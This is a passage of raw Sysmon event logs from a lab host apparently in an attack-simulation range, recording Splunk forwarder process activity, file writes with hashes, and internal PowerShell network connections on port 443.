Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A030-6140-6A56-04000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.855{B81B27B7-A030-6140-6A56-04000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6590D32878C17F4E2BB5A03043372F1C,SHA256=780463CBF3FF79836EBC6F32C5D62A8ADFAB5AE1216B86E7E9C50A9FD41762CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A030-6140-6956-04000000C801}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A030-6140-6956-04000000C801}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A030-6140-6956-04000000C801}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.155{B81B27B7-A030-6140-6956-04000000C801}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=699FD1C014D0C4ED7072B5F614B4AF38,SHA256=1E17BBDEFD925BD4AA3381A8B40B051A05AE57C0A7E5463B05872B8193C2FAE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:55.490{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50463-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=860A1C50849D3838B601B34C994791A5,SHA256=887887ACDA7E1F73351E0DDED7B0DE1B5BD955935223B3DAF1B2796C13606B0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7CBEAC9A14A91AE08178B328A45D6E4,SHA256=BED37D9C73B379216BB1A776B3315013C0329A6BA85F19569FEDC6D80AA593C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.038{B81B27B7-A030-6140-6A56-04000000C801}57766180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:26.708{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E99914B609FAF32F4D91EDF42C37480C,SHA256=10E7A1C0B74F25717C5E81063D30743BCD619DAF8146C46F556E28EA9250E614,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:27.716{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C63111A38584AB50792CBFDC8C54754,SHA256=4354B3CBE854DD78A005880086D0E9D9DB04F7262CC581560423EB6ACBE29860,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:28.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7351AD69B165AEFF9CB034D8854F2A3,SHA256=E03F70EF39DE9193B554FDB8B15915E0C195CF7E7DA7A057330CE242D7A3E71E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:57.834{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50464-false10.0.1.12-8000- 23542300x800000000000000036496849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:29.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D974AFC5F512221AE677BB213CD4256A,SHA256=BDAF51A570EB76F118297B904742F94BB9462127ABEEC2207A4CB2BB84F6F1CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:30.876{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=807B2E24DBE0D51F3092C1397BCBC72A,SHA256=BB6D798CB8D40317CE666329FDCC6B5415AD5DF0F81C5875663E03FF3F40649E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:30.829{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F71C3190126DE386F69304F86B664C76,SHA256=C279B0E9E784EBD2387D6C79305C65388CA1D785303866194B9749A063F904B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:31.843{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4059C124D823134D455C57E2371F242E,SHA256=1BBAE5BEA78D9C8EE7B87DEA1E1164D41DFB28CF917B11DA3D2D535364CDF989,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:01.496{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50465-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:32.891{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBC44611528B9A0A93A7526112C90C1E,SHA256=723A3CBA7CD9EB723BE0039970D7248EF5093A8EFEDDBA9FB74E626FA83B7876,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:32.458{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:33.898{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D86352B076442F1FD6720F03EEF2DA9C,SHA256=CCB00EBF7D5487BDAEA6E715C64C35D836B507BD0910725F974983C9E44AA1E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:04.124{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50467-false10.0.1.12-8089- 354300x800000000000000036496856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:03.856{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50466-false10.0.1.12-8000- 23542300x800000000000000036496859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:34.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27DB2BE45E114E5E5BD811E1ACEA4D66,SHA256=BDED05E57ECC25D799CC997D06214ACC5192D19493B2AB71B14F61FAA56A9B64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:35.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BB7EF208F9F89C1B4936EB6BAC29563,SHA256=2C3919B85417AABBA5549333CD8B3AC5D4B4882C606B8806C886233DFB6295F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:35.847{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=73CE2990BD8EE198DB342AE5BABEB248,SHA256=1E873D2BC05397DE0A8FEA304F263A41421B358C9FF3C24C497B845514F9599A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:36.977{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76BB17CD4DB922441082B8C54272A356,SHA256=C98186AB4F439C1B7826FC39B22174985180174FFF7DA5BC38B4B1915BB0A315,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:06.499{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50468-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A78129B35ACDB566082B4E2532BD01E1,SHA256=D70F1CBC18A7A5B9AD7EC77C66FD4D636DBE8FE9BC9B15B61190E63AF62C6820,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A03D-6140-6B56-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 